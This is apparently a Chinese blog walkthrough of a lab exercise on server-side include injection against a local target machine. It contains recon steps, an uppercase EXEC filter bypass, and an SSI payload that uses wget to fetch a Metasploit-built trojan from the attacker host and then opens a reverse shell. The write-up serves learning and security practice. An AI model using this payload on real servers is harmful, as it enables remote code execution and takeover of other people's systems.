ssi注入详解
ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞
简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令
首先netdiscover -r 你的ip/24扫描得到靶场IP
用nmap进行扫描
用dirb进行扫描
发现了ssi,意识到可能是ssi注入
访问一下http://192.168.199.164/ssi
访问一下http://192.168.199.164/index,这是已经可以基本确定是ssi注入了
访问一下robots,发现了一个敏感目录
访问这个敏感目录
发现两个备份文件,打开看看,在第二个文件发现了当前目录,错误日志和登录日志的位置
访问一下这个网站,把访问index的内容输上去看看
发现过滤的exec
用大写可以
但是返回的好像不大对,然后我去查了一下,发现少了一个!
加上感叹号,用大写再试一次,成功了
用msf做一个木马,这里选择的是py,也可以用php等
移动到Apache2的根目录下
检查一下Apache2服务是否开启
利用ssi注入下载这个木马
<!--#EXEC cmd="wget http://192.168.199.161/shell.py"-->第一个框里其实填什么都可以,跟sql注入一样
提升权限
打开msf
设置监听
运行木马
成功连接
sysinfo查看信息
输入shell进行控制,输入python -c "import pty;pty.spawn('/bin/bash')"进行美化
接下来cd /root切换到root目录,一般情况flag就在这里,因为我当时漏掉了提权那步,所以权限不够,又懒得在重新弄了…
总结
- 上一篇: Win系统 - 内存稳定性测试软件(Me
- 下一篇: 合并支付宝和微信的收钱码